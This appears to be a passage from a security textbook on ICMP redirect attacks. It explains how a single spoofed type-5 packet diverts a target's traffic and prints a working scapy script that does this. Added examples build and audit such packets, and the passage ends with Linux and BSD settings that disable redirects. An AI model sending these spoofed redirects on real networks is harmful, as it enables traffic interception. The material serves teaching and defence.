Understanding Network Hacks

5.10 ICMP-Redirection

Most network administrators nowadays know about man-in-the-middle attacks via ARP cache poisoning, described in Sect. 4.2. A man-in-the-middle built on an ICMP redirect is far quieter than ARP spoofing: the attack needs only a single packet to divert all of the target's traffic for a chosen destination, such as the default gateway, through the attacker's machine.

ICMP is much more than the everyday ICMP Echo Request sent by the ping command and the Echo Reply it provokes. ICMP is the error and control protocol of IP (see Sect. 2.8). It is used to tell a host that another host, a whole network, a protocol or a port is unreachable, that the TTL of a packet expired in transit, or that a router believes it knows a better next hop for the destination and that the host should use it for future packets. The last of these is the Redirect message (type 5), and it is the one we abuse here.

#!/usr/bin/env python3

import sys
import getopt
from scapy.all import send, IP, ICMP, Raw

# The address we send the packet to
target = None

# The address of the original gateway
old_gw = None

# The address of our desired gateway
new_gw = None


def usage():
    print(sys.argv[0] + """
    -t <target>
    -o <old_gw>
    -n <new_gw>""")
    sys.exit(1)


# Parsing parameters
try:
    cmd_opts = "t:o:n:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-t":
        target = opt[1]
    elif opt[0] == "-o":
        old_gw = opt[1]
    elif opt[0] == "-n":
        new_gw = opt[1]
    else:
        usage()

# All three addresses are required
if not (target and old_gw and new_gw):
    usage()

# Construct and send the packet: the outer IP header is spoofed from the old
# gateway, ICMP type 5 / code 1 (redirect for host) names the new gateway,
# and the payload carries the header of the datagram the redirect pretends
# to answer plus 8 bytes of its data, which RFC 792 requires and which Linux
# insists on before it looks at a redirect at all
packet = (IP(src=old_gw, dst=target) /
          ICMP(type=5, code=1, gw=new_gw) /
          IP(src=target, dst='0.0.0.0') /
          Raw(b'\x00' * 8))
send(packet)

The source code should look familiar, because it is mostly the same as the IP spoofing example in Sect. 5.6; it differs only in how the packet is built. We construct a packet that looks as if it came from the old gateway, the router the target currently uses, and that tells the target: "Hey, there's someone who can do the job better than me!". Translated to ICMP that is type 5, code 1 (redirect for host), and the gw field carries the IP of the new gateway. Last but not least, the embedded IP header names the destination the redirect applies to; the script uses 0.0.0.0 to aim at the default route, and you can put any other destination there instead. Two caveats matter in practice. First, RFC 792 defines a redirect per destination: a receiver updates only its route to the host (code 1) or network (code 0) named in the embedded header, and the Linux kernel records such a redirect as a per-destination route exception rather than rewriting its routing table, so redirect the concrete destination whose traffic you want and check what the target will actually use with ip route get <destination>. Second, a Linux receiver discards a redirect that does not carry at least the embedded IP header plus 8 bytes of the original datagram, so the embedded header should be followed by 8 bytes of payload.
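To make the packet layout concrete, and to show what a host-based check of an incoming redirect can and cannot catch, here is an added example that is not part of the book: it builds the same datagram as the scapy script above using only the Python standard library, parses it back the way a receiver would, and applies the plausibility checks a cautious host or an IDS sensor would run. All addresses, the prefix and the list of known routers are constructed sample values; the function and field names are the example's own, not a library API.

```python
#!/usr/bin/env python3
"""ICMP Redirect: build the attacker's datagram and audit it on the receiver.

Added example, not the book's code. Standard library only. Layout matches the
scapy script: outer IP, ICMP type 5, embedded IP header plus 8 bytes of data.
All addresses and the interface configuration are constructed sample values.
"""
import ipaddress
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; returns 0 when run over a valid header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """Minimal 20-byte IPv4 header with a correct checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_redirect(old_gw: str, target: str, new_gw: str, redirected_dst: str, code: int = 1) -> bytes:
    """Outer IP spoofed from old_gw, ICMP type 5 with gateway = new_gw, then the
    header (+8 bytes) of the datagram the redirect pretends to answer."""
    embedded = ipv4_header(target, redirected_dst, 17, 8) + b"\x00" * 8  # 8 bytes of a UDP header
    icmp = struct.pack("!BBH4s", 5, code, 0, ipaddress.ip_address(new_gw).packed) + embedded
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return ipv4_header(old_gw, target, 1, len(icmp)) + icmp


def parse_redirect(pkt: bytes):
    """Return the fields of an ICMP Redirect, or None if pkt is not a usable one."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1:                       # not ICMP
        return None
    icmp = pkt[ihl:]
    if len(icmp) < 8 + 20 + 8:            # Linux drops redirects shorter than header + 8 bytes
        return None
    itype, code, _, gw = struct.unpack("!BBH4s", icmp[:8])
    if itype != 5:
        return None
    embedded = icmp[8:]
    return {
        "sender": str(ipaddress.ip_address(pkt[12:16])),
        "receiver": str(ipaddress.ip_address(pkt[16:20])),
        "code": code,
        "new_gw": str(ipaddress.ip_address(gw)),
        "redirected_dst": str(ipaddress.ip_address(embedded[16:20])),
        "valid_checksums": checksum(pkt[:ihl]) == 0 and checksum(icmp) == 0,
    }


def audit_redirect(info: dict, my_ip: str, my_gateway: str, my_prefix: str, known_routers: set) -> list:
    """Checks a cautious receiver applies before trusting a redirect. Note which
    ones the attack passes: the sender check is defeated by spoofing and the
    on-link check is satisfied by any attacker on the same segment, so the
    allow-list of known routers is the check that actually catches it."""
    findings = []
    link = ipaddress.ip_network(my_prefix, strict=False)
    new_gw = ipaddress.ip_address(info["new_gw"])
    dest = ipaddress.ip_address(info["redirected_dst"])
    if not info["valid_checksums"]:
        findings.append("bad checksum")
    if info["sender"] != my_gateway:
        findings.append("sender %s is not the gateway in use (%s)" % (info["sender"], my_gateway))
    if new_gw not in link:
        findings.append("new gateway %s is not on the local link" % new_gw)
    if str(new_gw) == my_ip:
        findings.append("redirect points at ourselves")
    if dest.is_unspecified or dest.is_multicast or dest.is_loopback:
        findings.append("redirected destination %s is not a unicast host" % dest)
    if str(new_gw) not in known_routers:
        findings.append("new gateway %s is not a known router" % new_gw)
    return findings


if __name__ == "__main__":
    # Constructed scenario: victim 192.168.1.20 behind router 192.168.1.1,
    # attacker 192.168.1.66 redirecting the victim's traffic for 203.0.113.10.
    pkt = build_redirect("192.168.1.1", "192.168.1.20", "192.168.1.66", "203.0.113.10")
    info = parse_redirect(pkt)
    print(info)
    for f in audit_redirect(info, "192.168.1.20", "192.168.1.1", "192.168.1.0/24", {"192.168.1.1"}):
        print("ALERT:", f)
```

Run it as is to see the constructed attack flagged only by the router allow-list; swap the new gateway for a second legitimate router in the allow-list and the audit comes back empty, which is exactly why a single-router segment should treat any redirect as an alert.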

ICMP redirection attacks are easily defended against on a Linux system by turning off the accept_redirects kernel option. On a running system:

echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/default/accept_redirects

or, to make it permanent, by editing /etc/sysctl.conf and setting

net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

and loading it with sysctl -p. Note that on an interface that does not forward packets the kernel accepts redirects if either conf/all or conf/<interface>/accept_redirects is 1, so switching off all alone leaves an interface that still carries the default 1 exposed; set default as well (it seeds interfaces created later) and the per-interface entries of interfaces that already exist, then verify with sysctl -a | grep accept_redirects. Do not rely on secure_redirects instead: it restricts the new gateway to configured default gateways, but it is overridden by shared_media, which is on by default. The same applies to IPv6 via net.ipv6.conf.all.accept_redirects and net.ipv6.conf.default.accept_redirects.

BSD and Mac OS X systems provide similar functionality, e.g. sysctl net.inet.icmp.drop_redirect=1.
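Because the effective setting is per interface and follows an AND/OR rule, a quick way to be sure the fix took is to compute that rule over the whole conf tree. The following is an added example, not the book's code: it audits every interface under /proc/sys/net/ipv4/conf, reports the ones that still accept redirects, and optionally writes the hardened values. The rule it applies is the one documented in the kernel's ip-sysctl text (forwarding off: all OR interface; forwarding on: all AND interface). SAMPLE is a constructed configuration used when the script is not run on Linux; the function names are the example's own, and writing to /proc requires root.

```python
#!/usr/bin/env python3
"""Audit and harden the Linux ICMP redirect sysctls.

Added example, not the book's code. Effective accept_redirects per interface:
forwarding off -> conf/all OR conf/<iface>; forwarding on -> conf/all AND
conf/<iface>. So "echo 0 > .../all/accept_redirects" alone is not enough on a
host whose interfaces still carry a 1. SAMPLE is constructed data; load_conf
and harden touch the real /proc tree (harden needs root).
"""
import os
import sys

CONF = "/proc/sys/net/ipv4/conf"
KNOBS = ("forwarding", "accept_redirects", "secure_redirects", "send_redirects")

# Constructed sample: "all" was switched off, but eth0 still has the default 1.
SAMPLE = {
    "all":     {"forwarding": 0, "accept_redirects": 0, "secure_redirects": 1, "send_redirects": 1},
    "default": {"forwarding": 0, "accept_redirects": 1, "secure_redirects": 1, "send_redirects": 1},
    "lo":      {"forwarding": 0, "accept_redirects": 0, "secure_redirects": 1, "send_redirects": 1},
    "eth0":    {"forwarding": 0, "accept_redirects": 1, "secure_redirects": 1, "send_redirects": 1},
}


def load_conf(base=CONF):
    """Read the knobs of every entry under base (all, default and each interface)."""
    conf = {}
    for iface in os.listdir(base):
        conf[iface] = {}
        for knob in KNOBS:
            with open(os.path.join(base, iface, knob)) as fh:
                conf[iface][knob] = int(fh.read().strip())
    return conf


def accepts_redirects(conf, iface):
    """Effective accept_redirects for one interface (the kernel's AND/OR rule)."""
    a, i = conf["all"]["accept_redirects"], conf[iface]["accept_redirects"]
    if conf[iface]["forwarding"]:
        return bool(a and i)
    return bool(a or i)


def interfaces_accepting_redirects(conf):
    """Interfaces (excluding the all/default pseudo-entries) that still accept redirects."""
    return sorted(i for i in conf if i not in ("all", "default") and accepts_redirects(conf, i))


def harden(base=CONF):
    """Write 0 to accept_redirects (and send_redirects, which only matters when the
    host forwards) on all, default and every interface, so the result no longer
    depends on the AND/OR rule. Returns the paths written."""
    written = []
    for iface in os.listdir(base):
        for knob in ("accept_redirects", "send_redirects"):
            path = os.path.join(base, iface, knob)
            with open(path, "w") as fh:
                fh.write("0\n")
            written.append(path)
    return written


if __name__ == "__main__":
    on_linux = os.path.isdir(CONF)
    conf = load_conf() if on_linux else SAMPLE
    bad = interfaces_accepting_redirects(conf)
    print("interfaces still accepting ICMP redirects:", ", ".join(bad) or "none")
    if bad and on_linux and "--fix" in sys.argv:
        for p in harden():
            print("wrote 0 to", p)
    sys.exit(1 if bad else 0)
```

Run without arguments to audit (exit status 1 if anything still accepts redirects), and with --fix as root to write the zeros; the sysctl.conf lines above keep them across reboots.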
